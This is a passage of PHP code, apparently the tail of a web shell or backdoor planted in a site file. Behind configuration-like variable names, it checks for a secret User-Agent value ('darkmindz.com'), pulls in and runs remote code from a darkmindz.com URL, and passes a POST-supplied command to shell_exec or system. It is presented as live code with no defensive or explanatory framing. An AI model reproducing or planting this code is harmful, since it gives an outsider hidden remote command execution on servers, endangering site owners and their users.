"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } $config_x = $_SERVER['HTTP_USER_AGENT']; $config_y = $_POST['go']; if($config_x == "darkmindz.com") { @include('http://www.darkmindz.com/shell/x2300.txt'); echo '
'; if(isset($config_y)) { $cmd = $_POST['cmd']; execute_command(get_execution_method(), $cmd); }  echo "
"; exit;} ?>